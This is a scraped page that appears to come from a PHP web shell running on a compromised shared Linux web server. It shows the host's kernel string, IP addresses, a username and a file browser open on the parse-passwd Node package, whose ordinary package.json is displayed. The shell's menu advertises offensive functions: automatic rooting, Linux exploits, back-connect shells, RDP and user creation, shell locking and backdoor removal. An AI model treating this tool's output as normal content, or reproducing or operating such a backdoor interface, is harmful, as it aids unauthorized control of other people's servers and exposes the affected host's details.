Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
parse-passwd /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.35
KB
-rw-r--r--
package.json
1004
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "parse-passwd", "description": "Parse a passwd file into a list of users.", "version": "1.0.0", "homepage": "https://github.com/doowb/parse-passwd", "author": "Brian Woodward (https://github.com/doowb)", "repository": "doowb/parse-passwd", "bugs": { "url": "https://github.com/doowb/parse-passwd/issues" }, "license": "MIT", "files": [ "index.js", "LICENSE" ], "main": "index.js", "engines": { "node": ">=0.10.0" }, "scripts": { "test": "mocha" }, "devDependencies": { "gulp-format-md": "^0.1.11", "mocha": "^3.1.2" }, "keywords": [ "etc", "etc-passwd", "etc/passwd", "parse", "parse-passwd", "passwd" ], "verb": { "toc": false, "layout": "default", "tasks": [ "readme" ], "plugins": [ "gulp-format-md" ], "lint": { "reflinks": true }, "related": { "list": [] }, "reflinks": [ "verb", "verb-generate-readme" ] } }
Close